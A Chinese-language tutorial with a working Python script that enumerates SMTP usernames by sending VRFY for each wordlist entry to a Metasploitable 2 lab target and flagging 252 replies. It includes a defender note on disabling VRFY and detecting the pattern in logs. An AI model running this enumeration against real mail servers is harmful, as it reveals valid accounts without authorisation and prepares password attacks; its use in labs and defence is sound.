利用Python破解SMTP服务器用户名
本代码的运行及测试环境:在Kali Linux上运行Python代码,目标机器为Metasploitable 2,该目标机器上运行着SMTP服务。脚本通过SMTP的VRFY命令逐个验证字典中的用户名,并根据服务器返回的响应码判断该用户名是否存在。
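import optparse
import os
import socket
import sys

import termcolor


class SMTPUserCrack:
    """Check which names from a wordlist an SMTP server confirms via VRFY.

    For every line of the wordlist the script opens a TCP connection, sends
    ``VRFY <name>`` and treats a ``252`` reply as "this mailbox exists".

    Defender note: the check only works while the server answers VRFY
    differently for known and unknown mailboxes.  Turning the command off
    (e.g. Postfix ``disable_vrfy_command = yes``) removes that signal, and a
    burst of short connections that each send a single VRFY is the pattern
    to look for in the mail log.
    """

    def __init__(self) -> None:
        # Parse the command line once; the original parsed it three times.
        self.target, self.port, self.filename = self.get_params()

    def get_params(self):
        """Parse and validate the command-line options.

        Returns:
            A ``(target, port, filename)`` tuple.  ``port`` falls back to 25
            when ``-p`` is not given.

        Exits with status 1 when the target or wordlist is missing, or when
        the wordlist path is not a readable file.
        """
        parser = optparse.OptionParser('Usage: <Program> -t server IP address -p port -f wordlist of username')
        parser.add_option('-t', '--target', dest='target', type='string', help="Specify target IP address")
        parser.add_option('-p', '--port', dest='port', type='int', help="Specify smtp server port")
        parser.add_option('-f', '--filename', dest='filename', type='string', help='Specify wordlist')
        options, args = parser.parse_args()
        if options.target is None or options.filename is None:
            print(parser.usage)
            # Bad invocation is an error, so do not report success to the shell.
            sys.exit(1)
        if options.port is None:
            options.port = 25
        # isfile() also rejects a directory, which exists() would let through
        # only to fail later inside open().
        if not os.path.isfile(options.filename):
            print("[-] The file does not exist")
            sys.exit(1)
        return options.target, options.port, options.filename

    def port_scan(self):
        """Return True when a TCP connection to target:port succeeds."""
        try:
            # The context manager closes the socket on every path.
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.settimeout(2)
                return s.connect_ex((self.target, self.port)) == 0
        except OSError:
            # e.g. the target name cannot be resolved
            return False

    def check_user(self, username):
        """Send ``VRFY username`` and report whether the server replied 252.

        Returns:
            True when a reply line starts with ``252``; False for any other
            reply or when the connection fails or times out.
        """
        try:
            # Creating the socket inside ``with`` avoids the original's
            # ``finally: s.close()`` touching an unbound name when
            # socket.socket() itself raised.
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.settimeout(2)
                s.connect((self.target, self.port))
                s.recv(1024)  # read and discard the greeting banner
                command = 'VRFY %s\n' % username
                s.sendall(command.encode('utf-8'))
                response = s.recv(1024).decode('utf-8', errors='replace')
        except (OSError, UnicodeError):
            # Best effort per name: an unreachable server or an unencodable
            # wordlist entry counts as "not confirmed".
            return False

        # The reply code is the first token of a reply line; a plain
        # substring test would also match "252" inside the text of an
        # unrelated reply.
        if any(reply.startswith('252') for reply in response.splitlines()):
            print("\t[+] SMTP User Found: \t", termcolor.colored(username, 'blue'))
            return True
        return False

    def run(self):
        """Check the port, then test every wordlist entry and report matches."""
        if not self.port_scan():
            print("[-] The target has no SMTP service running over the port: %d" % self.port)
            # The original printed this and carried on with the wordlist.
            sys.exit(1)

        print("[-] The port is running smtp service: %d" % self.port)

        found_any = False
        with open(self.filename, 'r') as f:
            for line in f:
                username = line.strip()
                if not username:
                    continue  # skip blank wordlist lines
                if self.check_user(username):
                    found_any = True

        # Only report failure when no entry was confirmed; the original flag
        # was never set and its test was inverted, so this line never ran.
        if not found_any:
            print("[-] Failed to crack")


if __name__ == "__main__":
    smtpuser = SMTPUserCrack()
    smtpuser.run()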